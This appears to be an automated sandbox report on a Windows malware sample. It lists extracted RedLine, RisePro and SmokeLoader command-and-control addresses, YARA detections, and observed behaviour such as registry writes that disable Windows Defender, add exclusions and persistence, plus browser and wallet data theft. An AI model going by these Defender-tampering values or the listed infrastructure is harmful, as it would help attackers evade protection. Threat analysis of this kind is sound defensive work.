Analysis
-
max time kernel
118s -
max time network
153s -
platform
windows10-1703_x64 -
resource
win10-20231020-en -
resource tags
arch:x64arch:x86image:win10-20231020-enlocale:en-usos:windows10-1703-x64system -
submitted
16-11-2023 19:24
Static task
static1
Behavioral task
behavioral1
Sample
9e3278cebd97cbe59695927e2c70950ad382a977b167599081986e355cc5e7f9.exe
Resource
win10-20231020-en
General
-
Target
9e3278cebd97cbe59695927e2c70950ad382a977b167599081986e355cc5e7f9.exe
-
Size
1.4MB
-
MD5
027c772d551e44636ad61f38c2d73131
-
SHA1
798e7b6eebc2cb35e2abb3291374b292080bd643
-
SHA256
9e3278cebd97cbe59695927e2c70950ad382a977b167599081986e355cc5e7f9
-
SHA512
4959beb25c705819bde2f72b2f8216cbecbb8eefcf0b3ca43d1d0de9ab698b2e7db2bf63d00dd0fe25fd39eb8c5b23d064b45a71d5ef12ca5c3e7974d6de96b7
-
SSDEEP
24576:ZywIj0CVunxV79Qd9yA7A+4w0gIQAVOBTeFr1IH272vTAAjHqxYgRR6rCvhVF:Mp9yy71AVOZav6TECW
Malware Config
Extracted
redline
horda
194.49.94.152:19053
Extracted
risepro
194.49.94.152
Extracted
smokeloader
2022
http://5.42.92.190/fks/index.php
Extracted
redline
pixelfresh
194.49.94.11:80
Extracted
redline
@ytlogsbot
194.169.175.235:42691
Extracted
smokeloader
up3
Extracted
smokeloader
2020
http://host-file-host6.com/
http://host-host-file8.com/
Signatures
-
Glupteba payload 4 IoCs
resource yara_rule behavioral1/memory/4876-175-0x0000000002E40000-0x000000000372B000-memory.dmp family_glupteba behavioral1/memory/4876-176-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/4876-177-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/4876-373-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 6qR7eS6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 6qR7eS6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 6qR7eS6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 6qR7eS6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 6qR7eS6.exe -
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 8 IoCs
resource yara_rule behavioral1/memory/3948-21-0x0000000000400000-0x000000000043C000-memory.dmp family_redline behavioral1/files/0x000a00000001abfe-108.dat family_redline behavioral1/files/0x000a00000001abfe-111.dat family_redline behavioral1/memory/2576-112-0x0000000000C30000-0x0000000000C4E000-memory.dmp family_redline behavioral1/memory/4620-145-0x0000000000400000-0x0000000000449000-memory.dmp family_redline behavioral1/memory/4428-148-0x0000000000400000-0x0000000000470000-memory.dmp family_redline behavioral1/memory/4428-142-0x0000000000540000-0x000000000059A000-memory.dmp family_redline behavioral1/memory/4620-141-0x00000000001C0000-0x00000000001FE000-memory.dmp family_redline -
SectopRAT payload 3 IoCs
resource yara_rule behavioral1/files/0x000a00000001abfe-108.dat family_sectoprat behavioral1/files/0x000a00000001abfe-111.dat family_sectoprat behavioral1/memory/2576-112-0x0000000000C30000-0x0000000000C4E000-memory.dmp family_sectoprat -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
description pid Process procid_target PID 1536 created 3244 1536 latestX.exe 54 PID 1536 created 3244 1536 latestX.exe 54 PID 1536 created 3244 1536 latestX.exe 54 PID 1536 created 3244 1536 latestX.exe 54 PID 1536 created 3244 1536 latestX.exe 54 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" e0cbefcb1af40c7d4aff4aca26621a98.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" e0cbefcb1af40c7d4aff4aca26621a98.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" e0cbefcb1af40c7d4aff4aca26621a98.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" e0cbefcb1af40c7d4aff4aca26621a98.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" e0cbefcb1af40c7d4aff4aca26621a98.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\e0cbefcb1af40c7d4aff4aca26621a98.exe = "0" e0cbefcb1af40c7d4aff4aca26621a98.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" e0cbefcb1af40c7d4aff4aca26621a98.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts latestX.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
pid Process 3224 netsh.exe -
Stops running service(s) 3 TTPs
-
.NET Reactor proctector 19 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral1/memory/2812-58-0x0000000002190000-0x00000000021B0000-memory.dmp net_reactor behavioral1/memory/2812-60-0x0000000004E50000-0x0000000004E6E000-memory.dmp net_reactor behavioral1/memory/2812-62-0x0000000004E50000-0x0000000004E69000-memory.dmp net_reactor behavioral1/memory/2812-61-0x0000000004E50000-0x0000000004E69000-memory.dmp net_reactor behavioral1/memory/2812-64-0x0000000004E50000-0x0000000004E69000-memory.dmp net_reactor behavioral1/memory/2812-66-0x0000000004E50000-0x0000000004E69000-memory.dmp net_reactor behavioral1/memory/2812-68-0x0000000004E50000-0x0000000004E69000-memory.dmp net_reactor behavioral1/memory/2812-70-0x0000000004E50000-0x0000000004E69000-memory.dmp net_reactor behavioral1/memory/2812-72-0x0000000004E50000-0x0000000004E69000-memory.dmp net_reactor behavioral1/memory/2812-74-0x0000000004E50000-0x0000000004E69000-memory.dmp net_reactor behavioral1/memory/2812-76-0x0000000004E50000-0x0000000004E69000-memory.dmp net_reactor behavioral1/memory/2812-78-0x0000000004E50000-0x0000000004E69000-memory.dmp net_reactor behavioral1/memory/2812-80-0x0000000004E50000-0x0000000004E69000-memory.dmp net_reactor behavioral1/memory/2812-82-0x0000000004E50000-0x0000000004E69000-memory.dmp net_reactor behavioral1/memory/2812-84-0x0000000004E50000-0x0000000004E69000-memory.dmp net_reactor behavioral1/memory/2812-86-0x0000000004E50000-0x0000000004E69000-memory.dmp net_reactor behavioral1/memory/2812-88-0x0000000004E50000-0x0000000004E69000-memory.dmp net_reactor behavioral1/memory/2812-90-0x0000000004E50000-0x0000000004E69000-memory.dmp net_reactor behavioral1/memory/2812-92-0x0000000004E50000-0x0000000004E69000-memory.dmp net_reactor -
Executes dropped EXE 22 IoCs
pid Process 4896 Vn4fk12.exe 3484 eq3St12.exe 3908 2ej3685.exe 1708 4Fh495aL.exe 712 5Sb7qh5.exe 2812 6qR7eS6.exe 432 1911.exe 2576 1AF6.exe 4620 1CFB.exe 4428 2316.exe 196 InstallSetup5.exe 2764 toolspub2.exe 4876 e0cbefcb1af40c7d4aff4aca26621a98.exe 2320 Broom.exe 1536 latestX.exe 4472 toolspub2.exe 4184 96A2.exe 524 9A1D.exe 1276 e0cbefcb1af40c7d4aff4aca26621a98.exe 3560 9A1D.exe 4628 updater.exe 820 csrss.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 6qR7eS6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" e0cbefcb1af40c7d4aff4aca26621a98.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" e0cbefcb1af40c7d4aff4aca26621a98.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" e0cbefcb1af40c7d4aff4aca26621a98.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\e0cbefcb1af40c7d4aff4aca26621a98.exe = "0" e0cbefcb1af40c7d4aff4aca26621a98.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 6qR7eS6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" e0cbefcb1af40c7d4aff4aca26621a98.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" e0cbefcb1af40c7d4aff4aca26621a98.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" e0cbefcb1af40c7d4aff4aca26621a98.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" eq3St12.exe Set value (str) \REGISTRY\USER\S-1-5-21-2640874492-649017405-3475600720-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" e0cbefcb1af40c7d4aff4aca26621a98.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 9e3278cebd97cbe59695927e2c70950ad382a977b167599081986e355cc5e7f9.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" Vn4fk12.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 3908 set thread context of 3948 3908 2ej3685.exe 76 PID 1708 set thread context of 3896 1708 4Fh495aL.exe 81 PID 2764 set thread context of 4472 2764 toolspub2.exe 97 PID 524 set thread context of 3560 524 9A1D.exe 105 PID 4184 set thread context of 3748 4184 96A2.exe 111 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN e0cbefcb1af40c7d4aff4aca26621a98.exe -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe latestX.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\rss e0cbefcb1af40c7d4aff4aca26621a98.exe File created C:\Windows\rss\csrss.exe e0cbefcb1af40c7d4aff4aca26621a98.exe -
Launches sc.exe 12 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2076 sc.exe 4620 sc.exe 2764 sc.exe 4516 sc.exe 304 sc.exe 2952 sc.exe 344 sc.exe 4804 sc.exe 1728 sc.exe 3032 sc.exe 1664 sc.exe 5020 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 5Sb7qh5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 5Sb7qh5.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 5Sb7qh5.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4820 schtasks.exe 1040 schtasks.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time" e0cbefcb1af40c7d4aff4aca26621a98.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\SYSTEM netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" e0cbefcb1af40c7d4aff4aca26621a98.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time" e0cbefcb1af40c7d4aff4aca26621a98.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" e0cbefcb1af40c7d4aff4aca26621a98.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time" e0cbefcb1af40c7d4aff4aca26621a98.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" e0cbefcb1af40c7d4aff4aca26621a98.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" e0cbefcb1af40c7d4aff4aca26621a98.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time" e0cbefcb1af40c7d4aff4aca26621a98.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" e0cbefcb1af40c7d4aff4aca26621a98.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" e0cbefcb1af40c7d4aff4aca26621a98.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" e0cbefcb1af40c7d4aff4aca26621a98.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" e0cbefcb1af40c7d4aff4aca26621a98.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time" e0cbefcb1af40c7d4aff4aca26621a98.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time" e0cbefcb1af40c7d4aff4aca26621a98.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time" e0cbefcb1af40c7d4aff4aca26621a98.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" e0cbefcb1af40c7d4aff4aca26621a98.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" e0cbefcb1af40c7d4aff4aca26621a98.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" e0cbefcb1af40c7d4aff4aca26621a98.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" e0cbefcb1af40c7d4aff4aca26621a98.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" e0cbefcb1af40c7d4aff4aca26621a98.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" e0cbefcb1af40c7d4aff4aca26621a98.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" e0cbefcb1af40c7d4aff4aca26621a98.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time" e0cbefcb1af40c7d4aff4aca26621a98.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" e0cbefcb1af40c7d4aff4aca26621a98.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time" e0cbefcb1af40c7d4aff4aca26621a98.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" e0cbefcb1af40c7d4aff4aca26621a98.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" e0cbefcb1af40c7d4aff4aca26621a98.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time" e0cbefcb1af40c7d4aff4aca26621a98.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" e0cbefcb1af40c7d4aff4aca26621a98.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 712 5Sb7qh5.exe 712 5Sb7qh5.exe 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 2812 6qR7eS6.exe 2812 6qR7eS6.exe 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3244 Explorer.EXE -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 712 5Sb7qh5.exe 4472 toolspub2.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2812 6qR7eS6.exe Token: SeShutdownPrivilege 3244 Explorer.EXE Token: SeCreatePagefilePrivilege 3244 Explorer.EXE Token: SeShutdownPrivilege 3244 Explorer.EXE Token: SeCreatePagefilePrivilege 3244 Explorer.EXE Token: SeShutdownPrivilege 3244 Explorer.EXE Token: SeCreatePagefilePrivilege 3244 Explorer.EXE Token: SeShutdownPrivilege 3244 Explorer.EXE Token: SeCreatePagefilePrivilege 3244 Explorer.EXE Token: SeShutdownPrivilege 3244 Explorer.EXE Token: SeCreatePagefilePrivilege 3244 Explorer.EXE Token: SeShutdownPrivilege 3244 Explorer.EXE Token: SeCreatePagefilePrivilege 3244 Explorer.EXE Token: SeShutdownPrivilege 3244 Explorer.EXE Token: SeCreatePagefilePrivilege 3244 Explorer.EXE Token: SeShutdownPrivilege 3244 Explorer.EXE Token: SeCreatePagefilePrivilege 3244 Explorer.EXE Token: SeShutdownPrivilege 3244 Explorer.EXE Token: SeCreatePagefilePrivilege 3244 Explorer.EXE Token: SeShutdownPrivilege 3244 Explorer.EXE Token: SeCreatePagefilePrivilege 3244 Explorer.EXE Token: SeDebugPrivilege 2576 1AF6.exe Token: SeShutdownPrivilege 3244 Explorer.EXE Token: SeCreatePagefilePrivilege 3244 Explorer.EXE Token: SeShutdownPrivilege 3244 Explorer.EXE Token: SeCreatePagefilePrivilege 3244 Explorer.EXE Token: SeShutdownPrivilege 3244 Explorer.EXE Token: SeCreatePagefilePrivilege 3244 Explorer.EXE Token: SeShutdownPrivilege 3244 Explorer.EXE Token: SeCreatePagefilePrivilege 3244 Explorer.EXE Token: SeDebugPrivilege 4620 1CFB.exe Token: SeDebugPrivilege 4428 2316.exe Token: SeShutdownPrivilege 3244 Explorer.EXE Token: SeCreatePagefilePrivilege 3244 Explorer.EXE Token: SeShutdownPrivilege 3244 Explorer.EXE Token: SeCreatePagefilePrivilege 3244 Explorer.EXE Token: SeShutdownPrivilege 3244 Explorer.EXE Token: SeCreatePagefilePrivilege 3244 Explorer.EXE Token: SeShutdownPrivilege 3244 Explorer.EXE Token: SeCreatePagefilePrivilege 3244 Explorer.EXE Token: SeShutdownPrivilege 3244 Explorer.EXE Token: SeCreatePagefilePrivilege 3244 Explorer.EXE Token: SeDebugPrivilege 3536 powershell.exe Token: SeShutdownPrivilege 3244 Explorer.EXE Token: SeCreatePagefilePrivilege 3244 Explorer.EXE Token: SeShutdownPrivilege 3244 Explorer.EXE Token: SeCreatePagefilePrivilege 3244 Explorer.EXE Token: SeDebugPrivilege 4876 e0cbefcb1af40c7d4aff4aca26621a98.exe Token: SeImpersonatePrivilege 4876 e0cbefcb1af40c7d4aff4aca26621a98.exe Token: SeDebugPrivilege 524 9A1D.exe Token: SeDebugPrivilege 224 powershell.exe Token: SeIncreaseQuotaPrivilege 224 powershell.exe Token: SeSecurityPrivilege 224 powershell.exe Token: SeTakeOwnershipPrivilege 224 powershell.exe Token: SeLoadDriverPrivilege 224 powershell.exe Token: SeSystemProfilePrivilege 224 powershell.exe Token: SeSystemtimePrivilege 224 powershell.exe Token: SeProfSingleProcessPrivilege 224 powershell.exe 